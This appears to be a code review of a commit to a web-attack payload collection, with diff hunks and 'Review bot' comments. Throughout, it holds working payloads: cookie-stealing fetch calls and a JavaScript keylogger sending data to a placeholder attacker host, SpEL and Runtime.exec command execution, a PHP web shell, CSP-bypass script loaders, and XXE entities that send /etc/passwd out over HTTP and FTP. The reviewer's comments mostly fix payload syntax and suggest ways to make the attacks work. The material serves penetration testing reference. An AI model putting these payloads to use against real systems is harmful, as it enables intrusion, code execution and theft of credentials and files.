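Review bot: the cookie-stealer payload `http://[ATTACKER.DOMAIN.TLD]/?cookie_stealer.php?=$(HTTP_COOKIE)` contains two `?` characters and an empty parameter name, so `cookie_stealer.php` ends up as part of the query string rather than the path. This was already the case before the domain was normalized, but a reader copying it will get a request that does not reach the script; `http://[ATTACKER.DOMAIN.TLD]/cookie_stealer.php?c=$(HTTP_COOKIE)` is what the description suggests.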

View File

@@ -120,7 +120,7 @@ The following PHP script can be used to generate a page that will redirect to th
$commands = array( $commands = array(
'HELO victim.com', 'HELO victim.com',
'MAIL FROM: <admin@victim.com>', 'MAIL FROM: <admin@victim.com>',
'RCPT To: <hacker@attacker.com>', 'RCPT To: <User@[ATTACKER.DOMAIN.TLD]>',
'DATA', 'DATA',
'Subject: @hacker!', 'Subject: @hacker!',
'Hello Friend', 'Hello Friend',

View File

@@ -397,7 +397,7 @@ ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().ex
DNS lookup DNS lookup
```java ```java
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","xxxxxxxxxxxxxx.burpcollaborator.net")} ${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","[ATTACKER.DOMAIN.TLD]")}
``` ```
### SpEL - Session Attributes ### SpEL - Session Attributes
@@ -413,7 +413,7 @@ ${pageContext.request.getSession().setAttribute("admin",true)}
- Method using `java.lang.Runtime` #1 - accessed with JavaClass - Method using `java.lang.Runtime` #1 - accessed with JavaClass
```java ```java
${T(java.lang.Runtime).getRuntime().exec("COMMAND_HERE")} ${T(java.lang.Runtime).getRuntime().exec("whoami")}
``` ```
- Method using `java.lang.Runtime` #2 - Method using `java.lang.Runtime` #2
@@ -427,13 +427,13 @@ ${pageContext.request.getSession().setAttribute("admin",true)}
- Method using `java.lang.Runtime` #3 - accessed with `invoke` - Method using `java.lang.Runtime` #3 - accessed with `invoke`
```java ```java
${''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(''.getClass().forName('java.lang.Runtime')).exec('COMMAND_HERE')} ${''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(''.getClass().forName('java.lang.Runtime')).exec('whoami')}
``` ```
- Method using `java.lang.Runtime` #3 - accessed with `javax.script.ScriptEngineManager` - Method using `java.lang.Runtime` #3 - accessed with `javax.script.ScriptEngineManager`
```java ```java
${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\\\"ping x.x.x.x\\\")"))} ${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\\\"whoami\\\")"))}
``` ```
- Method using `java.lang.ProcessBuilder` - Method using `java.lang.ProcessBuilder`
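Review bot: the `ScriptEngineManager` payload has one closing parenthesis too many at the end: `.eval("java.lang.Runtime.getRuntime().exec(\\\"whoami\\\")"))}` closes `eval(` and then closes a call that was never opened, so the expression will not parse. Drop one `)` before the `}`. Also, the two bullets in this hunk are both labelled "Method using `java.lang.Runtime` #3"; renumber the `ScriptEngineManager` one as #4.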
@@ -442,7 +442,7 @@ ${pageContext.request.getSession().setAttribute("admin",true)}
${request.setAttribute("c","".getClass().forName("java.util.ArrayList").newInstance())} ${request.setAttribute("c","".getClass().forName("java.util.ArrayList").newInstance())}
${request.getAttribute("c").add("cmd.exe")} ${request.getAttribute("c").add("cmd.exe")}
${request.getAttribute("c").add("/k")} ${request.getAttribute("c").add("/k")}
${request.getAttribute("c").add("ping x.x.x.x")} ${request.getAttribute("c").add("whoami")}
${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())} ${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())}
${request.getAttribute("a")} ${request.getAttribute("a")}
``` ```
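Review bot: with the argument changed to `whoami`, `cmd.exe /k` is the wrong switch. `/k` runs the command and keeps the interpreter alive, which leaves a lingering `cmd.exe` on the target for a one-shot PoC; `/c` runs `whoami` and exits. Unless the lingering shell is the point (it is not explained), change the `add("/k")` line to `add("/c")`.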

View File

@@ -162,7 +162,7 @@ PHP web shells don't always have the `<?php` tag, here are some alternatives:
* The `<?=` is shorthand syntax in PHP for outputting values. It is equivalent to using `<?php echo`. * The `<?=` is shorthand syntax in PHP for outputting values. It is equivalent to using `<?php echo`.
```php ```php
<?=`$_GET[0]`?> <?=`id`?>
``` ```
### Filename Vulnerabilities ### Filename Vulnerabilities
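Review bot: replacing `` `$_GET[0]` `` with `` `id` `` turns this example from a web shell into a page that always runs one fixed command, which contradicts the surrounding text ("PHP web shells don't always have the `<?php` tag"). The contributing rule about `id`/`whoami` applies to the command being demonstrated, not to the shell mechanism; keep the parameterized form and show `id` as the value passed in, e.g. `<?=`$_GET[0]`?>` requested as `?0=id`.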
@@ -244,11 +244,11 @@ Example of a malicious `uwsgi.ini` file:
; read from a symbol ; read from a symbol
foo = @(sym://uwsgi_funny_function) foo = @(sym://uwsgi_funny_function)
; read from binary appended data ; read from binary appended data
bar = @(data://[REDACTED]) bar = @(data://[ATTACKER.DOMAIN.TLD])
; read from http ; read from http
test = @(http://[REDACTED]) test = @(http://[ATTACKER.DOMAIN.TLD])
; read from a file descriptor ; read from a file descriptor
content = @(fd://[REDACTED]) content = @(fd://[ATTACKER.DOMAIN.TLD])
; read from a process stdout ; read from a process stdout
body = @(exec://whoami) body = @(exec://whoami)
; call a function returning a char * ; call a function returning a char *
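Review bot: `[ATTACKER.DOMAIN.TLD]` is the wrong placeholder for two of these three lines. `@(data://...)` reads binary data appended to the uWSGI executable and `@(fd://...)` reads from a numeric file descriptor; neither takes a hostname, so the new text describes values that cannot work. Only `@(http://[ATTACKER.DOMAIN.TLD])` is correct. Restore a neutral placeholder for the other two (for example `@(data://0)` with a comment, and `@(fd://3)`), matching the comments above each line.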

View File

@@ -50,11 +50,11 @@ Use a callback function from a whitelisted source listed in the CSP.
**Payload**: **Payload**:
`http://example.lab/csp.php?xss=f=document.createElement%28"iframe"%29;f.id="pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//remoteattacker.lab/csp.js%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;` `http://example.lab/csp.php?xss=f=document.createElement%28"iframe"%29;f.id="pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//[ATTACKER.DOMAIN.TLD]/csp.js%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;`
```js ```js
script=document.createElement('script'); script=document.createElement('script');
script.src='//remoteattacker.lab/csp.js'; script.src='//[ATTACKER.DOMAIN.TLD]/csp.js';
window.frames[0].document.head.appendChild(script); window.frames[0].document.head.appendChild(script);
``` ```
@@ -69,7 +69,7 @@ Source: [lab.wallarm.com](https://lab.wallarm.com/how-to-trick-csp-in-letting-yo
**Payload**: **Payload**:
```js ```js
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[YOUR_XSSHUNTER_USERNAME].xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000) d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[ATTACKER.DOMAIN.TLD]";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
``` ```
Source: [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f) Source: [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f)
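Review bot: replacing `https://[YOUR_XSSHUNTER_USERNAME].xss.ht` with a bare `https://[ATTACKER.DOMAIN.TLD]` drops the information that this payload (credited to Rhynorater on the line below) was written for an XSS Hunter probe host; the old placeholder told the reader which tooling the script URL belonged to. Either keep a short remark such as "originally an XSS Hunter endpoint" next to the source link, or accept that the link to the tooling is lost.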
@@ -126,13 +126,13 @@ Source: [@404death](https://twitter.com/404death/status/1191222237782659072)
- Inject a base tag. - Inject a base tag.
```html ```html
<base href=http://www.attacker.com> <base href=http://[ATTACKER.DOMAIN.TLD]>
``` ```
- Host your custom js file at the same path that one of the website's script. - Host your custom js file at the same path that one of the website's script.
```ps1 ```ps1
http://www.attacker.com/PATH.js http://[ATTACKER.DOMAIN.TLD]/PATH.js
``` ```
## Bypass CSP header sent by PHP ## Bypass CSP header sent by PHP
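Review bot: `http://[ATTACKER.DOMAIN.TLD]/PATH.js` is a URL, not PowerShell, so the ```ps1 fence on that block is misleading; use a plain ``` fence (or `text`) as the rest of the file does for non-code lines. In the same hunk, the unchanged context line "at the same path that one of the website's script" should read "at the same path as one of the website's scripts".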

View File

@@ -84,7 +84,7 @@ fclose($fp);
```html ```html
<script> <script>
fetch('https://<SESSION>.burpcollaborator.net', { fetch('https://[ATTACKER.DOMAIN.TLD]', {
method: 'POST', method: 'POST',
mode: 'no-cors', mode: 'no-cors',
body: document.cookie body: document.cookie
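Review bot: the snippet sends `document.cookie`, which by design omits any cookie flagged `HttpOnly`, so the request can arrive with an empty body even when the injection fires; the text around this block should state that precondition, since it is also the mitigation a defender will reach for. The host substitution itself is fine.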
@@ -108,7 +108,7 @@ document.body.innerHTML = "</br></br></br></br></br><h1>Please login to continue
Another way to collect sensitive data is to set a javascript keylogger. Another way to collect sensitive data is to set a javascript keylogger.
```javascript ```javascript
<img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'> <img src=x onerror='document.onkeypress=function(e){fetch("http://[ATTACKER.DOMAIN.TLD]/?k="+String.fromCharCode(e.which))},this.remove();'>
``` ```
### Other Ways ### Other Ways
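Review bot: the fence on this block is ```javascript but the content is an HTML `<img>` element with an inline `onerror` handler; tag it ```html like the other HTML snippets in this file. The new URL correctly adds the `/` before `?k=` that the old `http://domain.com?k=` lacked.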
@@ -152,7 +152,7 @@ Example:
<script>console.log("Test XSS from the search bar of page XYZ\n".concat(document.domain).concat("\n").concat(window.origin))</script> <script>console.log("Test XSS from the search bar of page XYZ\n".concat(document.domain).concat("\n").concat(window.origin))</script>
``` ```
References: Additional reading:
- [Google Bughunter University - XSS in sandbox domains](https://sites.google.com/site/bughunteruniversity/nonvuln/xss-in-sandbox-domain) - [Google Bughunter University - XSS in sandbox domains](https://sites.google.com/site/bughunteruniversity/nonvuln/xss-in-sandbox-domain)
- [LiveOverflow Video - DO NOT USE alert(1) for XSS](https://www.youtube.com/watch?v=KHwVjzWei1c) - [LiveOverflow Video - DO NOT USE alert(1) for XSS](https://www.youtube.com/watch?v=KHwVjzWei1c)
@@ -401,7 +401,7 @@ SVG 1.x (xlink:href)
```xml ```xml
<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="http://127.0.0.1:9999/red_lightning_xss_full.svg" height="200" width="200"/> <image xlink:href="http://10.10.10.10:9999/red_lightning_xss_full.svg" height="200" width="200"/>
</svg> </svg>
``` ```
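Review bot: `10.10.10.10` replaces `127.0.0.1` here and is reused later in this commit for the attacker-controlled host (for example `http://10.10.10.10:8080/xxe.xml`), but 10.0.0.0/8 is a routable private range, so a payload copied into a corporate network will send real requests to whatever sits at that address. A reserved documentation address (TEST-NET, 192.0.2.0/24, RFC 5737) is the usual choice for examples and avoids that side effect; whichever is kept, document it as a placeholder alongside `[ATTACKER.DOMAIN.TLD]`.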
@@ -411,7 +411,7 @@ SVG 1.x (xlink:href)
```xml ```xml
<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<use xlink:href="http://127.0.0.1:9999/red_lightning_xss_full.svg#lightning"/> <use xlink:href="http://10.10.10.10:9999/red_lightning_xss_full.svg#lightning"/>
</svg> </svg>
``` ```
@@ -470,7 +470,7 @@ div {
<script> <script>
document.getElementById('btn').onclick = function(e){ document.getElementById('btn').onclick = function(e){
window.poc = window.open('http://www.redacted.com/#login'); window.poc = window.open('http://10.10.10.10/#login');
setTimeout(function(){ setTimeout(function(){
window.poc.postMessage( window.poc.postMessage(
{ {
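Review bot: `www.redacted.com/#login` was the target application (the PoC opens the victim's login page and then posts a message into it), whereas `10.10.10.10` is used elsewhere in this commit for the attacker-controlled host (e.g. `http://10.10.10.10:8080/xxe.xml`); giving both roles the same address makes the example ambiguous. Use a distinct placeholder for the target, e.g. `window.open('http://[TARGET.DOMAIN.TLD]/#login')`.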
@@ -499,9 +499,9 @@ You can set up an alternative version
- Hosted on [xsshunter.trufflesecurity.com](https://xsshunter.trufflesecurity.com/) - Hosted on [xsshunter.trufflesecurity.com](https://xsshunter.trufflesecurity.com/)
```xml ```xml
"><script src="https://js.rip/<custom.name>"></script> "><script src="https://js.rip/[ATTACKER.DOMAIN.TLD]"></script>
"><script src=//<custom.subdomain>.xss.ht></script> "><script src=//[ATTACKER.DOMAIN.TLD]></script>
<script>$.getScript("//<custom.subdomain>.xss.ht")</script> <script>$.getScript("//[ATTACKER.DOMAIN.TLD]")</script>
``` ```
### Other Blind XSS tools ### Other Blind XSS tools
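Review bot: in `https://js.rip/<custom.name>` the placeholder was a path segment under the js.rip host, not a hostname, so `https://js.rip/[ATTACKER.DOMAIN.TLD]` is semantically wrong; keep a name placeholder there (e.g. `https://js.rip/[CUSTOM_NAME]`). The list item "Hosted on xsshunter.trufflesecurity.com" also shows the `.xss.ht` lines were service-specific, so after normalising them to `[ATTACKER.DOMAIN.TLD]` the bullet no longer explains what follows it; reword the bullet or keep the service name in a comment.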
@@ -530,7 +530,7 @@ You can use a [data grabber for XSS](#data-grabber) and a one-line HTTP server t
Eg. payload Eg. payload
```html ```html
<script>document.location='http://10.10.14.30:8080/XSS/grabber.php?c='+document.domain</script> <script>document.location='http://[ATTACKER.DOMAIN.TLD]/XSS/grabber.php?c='+document.domain</script>
``` ```
Eg. one-line HTTP server: Eg. one-line HTTP server:
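Review bot: the old URL carried a port (`10.10.14.30:8080`) that the new `http://[ATTACKER.DOMAIN.TLD]/XSS/grabber.php` drops; the paragraph pairs this payload with a one-line HTTP server, and if that server listens on 8080 the two halves of the example no longer agree. Keep the port in the placeholder (`http://[ATTACKER.DOMAIN.TLD]:8080/XSS/grabber.php?c=`) or make the server example listen on 80.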

View File

@@ -302,7 +302,7 @@ Payloads from [infosec-au/xxe-windows.md](https://gist.github.com/infosec-au/2c6
```xml ```xml
<?xml version="1.0" ?> <?xml version="1.0" ?>
<!DOCTYPE message [ <!DOCTYPE message [
<!ENTITY % ext SYSTEM "http://attacker.com/ext.dtd"> <!ENTITY % ext SYSTEM "http://[ATTACKER.DOMAIN.TLD]/ext.dtd">
%ext; %ext;
]> ]>
<message></message> <message></message>
@@ -343,29 +343,29 @@ Sometimes you won't have a result outputted in the page but you can still extrac
### Basic Blind XXE ### Basic Blind XXE
The easiest way to test for a blind XXE is to try to load a remote resource such as a Burp Collaborator. The easiest way to test for a blind XXE is to try to load a remote resource such as a callback endpoint controlled by the tester.
```xml ```xml
<?xml version="1.0" ?> <?xml version="1.0" ?>
<!DOCTYPE root [ <!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://UNIQUE_ID_FOR_BURP_COLLABORATOR.burpcollaborator.net/x"> %ext; <!ENTITY % ext SYSTEM "http://[ATTACKER.DOMAIN.TLD]/x"> %ext;
]> ]>
<r></r> <r></r>
``` ```
```xml ```xml
<!DOCTYPE root [<!ENTITY test SYSTEM 'http://UNIQUE_ID_FOR_BURP_COLLABORATOR.burpcollaborator.net'>]> <!DOCTYPE root [<!ENTITY test SYSTEM 'http://[ATTACKER.DOMAIN.TLD]'>]>
<root>&test;</root> <root>&test;</root>
``` ```
Send the content of `/etc/passwd` to "www.malicious.com", you may receive only the first line. Send the content of `/etc/passwd` to `http://[ATTACKER.DOMAIN.TLD]`, you may receive only the first line.
```xml ```xml
<?xml version="1.0" encoding="ISO-8859-1"?> <?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!DOCTYPE foo [
<!ELEMENT foo ANY > <!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "file:///etc/passwd" > <!ENTITY % xxe SYSTEM "file:///etc/passwd" >
<!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;"> <!ENTITY callhome SYSTEM "http://[ATTACKER.DOMAIN.TLD]/?%xxe;">
] ]
> >
<foo>&callhome;</foo> <foo>&callhome;</foo>
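Review bot: "Send the content of `/etc/passwd` to `http://[ATTACKER.DOMAIN.TLD]`, you may receive only the first line." is a comma splice; split it into two sentences. It would also help to say why only one line arrives: the file content is spliced into a URL, so the first newline ends the usable part, and a parser that enforces the XML 1.0 rule against parameter-entity references inside markup declarations in the internal subset rejects the `%xxe;` in the `callhome` declaration altogether, which is why the external-DTD variants in the following hunks behave differently. Adding `http://` to the `callhome` URL is a good fix; `www.malicious.com/?%xxe;` had no scheme.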
@@ -377,12 +377,12 @@ Send the content of `/etc/passwd` to "www.malicious.com", you may receive only t
```xml ```xml
<?xml version="1.0" encoding="utf-8"?> <?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd"> <!DOCTYPE data SYSTEM "http://[ATTACKER.DOMAIN.TLD]/parameterEntity_oob.dtd">
<data>&send;</data> <data>&send;</data>
File stored on http://publicServer.com/parameterEntity_oob.dtd File stored on http://[ATTACKER.DOMAIN.TLD]/parameterEntity_oob.dtd
<!ENTITY % file SYSTEM "file:///sys/power/image_size"> <!ENTITY % file SYSTEM "file:///sys/power/image_size">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>"> <!ENTITY % all "<!ENTITY send SYSTEM 'http://[ATTACKER.DOMAIN.TLD]/?%file;'>">
%all; %all;
``` ```
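Review bot: `File stored on http://[ATTACKER.DOMAIN.TLD]/parameterEntity_oob.dtd` is prose sitting inside the ```xml fence, so the block is neither a valid XML document nor a valid DTD as a whole; move that sentence out of the fence and split the block into two (the XML document, then the DTD file), the way the `_xxe.svg_:` and `_xxe.xml_:` sections later in this file already do. The same applies to `File stored on http://10.10.10.10/dtd.xml` in the next hunk.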
@@ -392,15 +392,15 @@ File stored on http://publicServer.com/parameterEntity_oob.dtd
<?xml version="1.0" ?> <?xml version="1.0" ?>
<!DOCTYPE r [ <!DOCTYPE r [
<!ELEMENT r ANY > <!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml"> <!ENTITY % sp SYSTEM "http://10.10.10.10/dtd.xml">
%sp; %sp;
%param1; %param1;
]> ]>
<r>&exfil;</r> <r>&exfil;</r>
File stored on http://127.0.0.1/dtd.xml File stored on http://10.10.10.10/dtd.xml
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> <!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.10.10.10/dtd.xml?%data;'>">
``` ```
### XXE OOB with Apache Karaf ### XXE OOB with Apache Karaf
@@ -412,7 +412,7 @@ CVE-2018-11788 affecting versions:
```xml ```xml
<?xml version="1.0" encoding="UTF-8"?> <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://27av6zyg33g8q8xu338uvhnsc.canarytokens.com"> %dtd;] <!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://[ATTACKER.DOMAIN.TLD]"> %dtd;]
<features name="my-features" xmlns="http://karaf.apache.org/xmlns/features/v1.3.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" <features name="my-features" xmlns="http://karaf.apache.org/xmlns/features/v1.3.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://karaf.apache.org/xmlns/features/v1.3.0 http://karaf.apache.org/xmlns/features/v1.3.0"> xsi:schemaLocation="http://karaf.apache.org/xmlns/features/v1.3.0 http://karaf.apache.org/xmlns/features/v1.3.0">
<feature name="deployer" version="2.0" install="auto"> <feature name="deployer" version="2.0" install="auto">
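Review bot: the `<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://[ATTACKER.DOMAIN.TLD]"> %dtd;]` line is never closed: the internal subset ends with `]` but the declaration lacks its `>` before `<features ...>`, so the features file is not well-formed XML as written. The old line has the same defect, so this predates the commit, but since the hunk is being touched anyway, close the declaration with `]>`.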
@@ -500,7 +500,7 @@ _xxe.svg_:
<?xml version="1.0" standalone="yes"?> <?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [ <!DOCTYPE svg [
<!ELEMENT svg ANY > <!ELEMENT svg ANY >
<!ENTITY % sp SYSTEM "http://example.org:8080/xxe.xml"> <!ENTITY % sp SYSTEM "http://10.10.10.10:8080/xxe.xml">
%sp; %sp;
%param1; %param1;
]> ]>
@@ -522,7 +522,7 @@ _xxe.xml_:
```xml ```xml
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/hostname"> <!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/hostname">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://example.org:2121/%data;'>"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://10.10.10.10:2121/%data;'>">
``` ```
### XXE Inside SOAP ### XXE Inside SOAP
@@ -530,7 +530,7 @@ _xxe.xml_:
```xml ```xml
<soap:Body> <soap:Body>
<foo> <foo>
<![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]> <![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://10.10.10.10:22/"> %dtd;]><xxx/>]]>
</foo> </foo>
</soap:Body> </soap:Body>
``` ```
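Review bot: `http://10.10.10.10:22/` keeps port 22 from the original `x.x.x.x:22`, and the "XXE Inside SOAP" section does not say why an SSH port is used for an HTTP fetch; either note that the port is arbitrary for a blind probe or use the same HTTP port as the other examples so readers do not assume it matters.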
@@ -597,7 +597,7 @@ Add your blind XXE payload inside `xl/workbook.xml`.
```xml ```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE cdl [<!ELEMENT cdl ANY ><!ENTITY % asd SYSTEM "http://x.x.x.x:8000/xxe.dtd">%asd;%c;]> <!DOCTYPE cdl [<!ELEMENT cdl ANY ><!ENTITY % asd SYSTEM "http://10.10.10.10:8000/xxe.dtd">%asd;%c;]>
<cdl>&rrr;</cdl> <cdl>&rrr;</cdl>
<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"> <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
``` ```
@@ -606,7 +606,7 @@ Alternatively, add your payload in `xl/sharedStrings.xml`:
```xml ```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE cdl [<!ELEMENT t ANY ><!ENTITY % asd SYSTEM "http://x.x.x.x:8000/xxe.dtd">%asd;%c;]> <!DOCTYPE cdl [<!ELEMENT t ANY ><!ENTITY % asd SYSTEM "http://10.10.10.10:8000/xxe.dtd">%asd;%c;]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="10" uniqueCount="10"><si><t>&rrr;</t></si><si><t>testA2</t></si><si><t>testA3</t></si><si><t>testA4</t></si><si><t>testA5</t></si><si><t>testB1</t></si><si><t>testB2</t></si><si><t>testB3</t></si><si><t>testB4</t></si><si><t>testB5</t></si></sst> <sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="10" uniqueCount="10"><si><t>&rrr;</t></si><si><t>testA2</t></si><si><t>testA3</t></si><si><t>testA4</t></si><si><t>testA5</t></si><si><t>testB1</t></si><si><t>testB2</t></si><si><t>testB3</t></si><si><t>testB4</t></si><si><t>testB5</t></si></sst>
``` ```
@@ -618,7 +618,7 @@ And using FTP instead of HTTP allows to retrieve much larger files.
```xml ```xml
<!ENTITY % d SYSTEM "file:///etc/passwd"> <!ENTITY % d SYSTEM "file:///etc/passwd">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>"> <!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://10.10.10.10:2121/%d;'>">
``` ```
Serve DTD and receive FTP payload using [staaldraad/xxeserv](https://github.com/staaldraad/xxeserv): Serve DTD and receive FTP payload using [staaldraad/xxeserv](https://github.com/staaldraad/xxeserv):
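Review bot: the hunk header's sentence "using FTP instead of HTTP allows to retrieve much larger files" should read "allows retrieving much larger files". The `ftp://10.10.10.10:2121/%d;` host and port agree with the `http://10.10.10.10:8000/xxe.dtd` lines in the preceding hunks, which is good, but nothing states that the DTD server and the FTP receiver are the same machine; one sentence under "Serve DTD and receive FTP payload" saying that xxeserv provides both would make the dependency explicit.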
@@ -637,7 +637,7 @@ When all you control is the DTD file, and you do not control the `xml` file, XXE
<!-- Load the contents of a sensitive file into a variable --> <!-- Load the contents of a sensitive file into a variable -->
<!ENTITY % payload SYSTEM "file:///etc/passwd"> <!ENTITY % payload SYSTEM "file:///etc/passwd">
<!-- Use that variable to construct an HTTP get request with the file contents in the URL --> <!-- Use that variable to construct an HTTP get request with the file contents in the URL -->
<!ENTITY % param1 '<!ENTITY &#37; external SYSTEM "http://my.evil-host.com/x=%payload;">'> <!ENTITY % param1 '<!ENTITY &#37; external SYSTEM "http://[ATTACKER.DOMAIN.TLD]/x=%payload;">'>
%param1; %param1;
%external; %external;
``` ```
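Review bot: the comment "construct an HTTP get request" should say `GET`, and both comments call the parameter entity a "variable"; naming it a parameter entity (`%payload;`) is more accurate. The `&#37;` on the `param1` line is also left unexplained: it is the character reference for `%`, needed because a literal `%` in an entity value must start a parameter-entity reference, so `&#37;` is what lets the replacement text of `param1` contain the `<!ENTITY % external ...>` declaration intact. A short comment on that line would help readers who are checking why their parser rejects or accepts it.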